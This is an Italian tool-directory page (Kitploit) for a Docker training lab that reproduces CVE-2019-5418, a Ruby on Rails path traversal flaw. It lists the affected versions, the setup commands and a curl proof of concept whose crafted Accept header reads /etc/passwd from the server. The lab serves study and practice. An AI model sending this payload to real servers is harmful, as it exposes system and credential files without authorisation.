Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2019-5418 — Ambiente di laboratorio basato su Docker per l'exploit di path traversal CVE-2019-5418 Ruby on Rails, con comandi curl PoC per leggere file arbitrari del server tramite header Accept appositamente creati. | Kitploit
Strumenti/GitHubGitHub/daehyeok0618/cve-2019-5418
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneLab e Pratica
GitHubdaehyeok0618/cve-2019-5418

CVE-2019-5418

Ambiente di laboratorio basato su Docker per l'exploit di path traversal CVE-2019-5418 Ruby on Rails, con comandi curl PoC per leggere file arbitrari del server tramite header Accept appositamente creati.

Vedi Repository
21 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2019-5418: Ruby on Rails Path Traversal e Lettura Arbitraria di File

Questo progetto è un ambiente per esercitarsi e riprodurre la vulnerabilità di inclusione di file locali (CVE-2019-5418) in Ruby on Rails. Tale vulnerabilità consente di leggere file arbitrari all'interno del server tramite path traversal attraverso l'intestazione Accept.

Riepilogo della vulnerabilità

Ruby on Rails è un framework per applicazioni web che consente agli sviluppatori di creare applicazioni web in modo rapido e semplice.

Action View di Ruby on Rails <5.2.2.1, <5.1.6.2, <5.0.7.2, <4.2.11.1 e v3 presenta una vulnerabilità di inclusione di file locali.

Quando render file viene utilizzato in un controller per renderizzare una vista da un'applicazione esterna, Rails determina la posizione del file basandosi sull'intestazione Accept fornita dall'utente. Inviando un'intestazione Accept con il valore Accept: ../../../../../../../../etc/passwd{{ l'attaccante può sfruttare una vulnerabilità di path traversal per leggere file arbitrari.

Configurazione dell'ambiente

Esegui i seguenti comandi per compilare e avviare Ruby on Rails 5.2.2:

root@kitploit:~
docker compose build
docker compose up -d

Dopo l'avvio del server, visita http://your-ip:3000 per accedere alla pagina di Ruby on Rails. image1

Esempio di PoC

root@kitploit:~
curl -H "Accept: ../../../../../../etc/passwd{{" http://localhost:3000/robots

image2 È stato letto con successo un file arbitrario all'interno del server tramite l'intestazione Accept.

Scarica lo strumento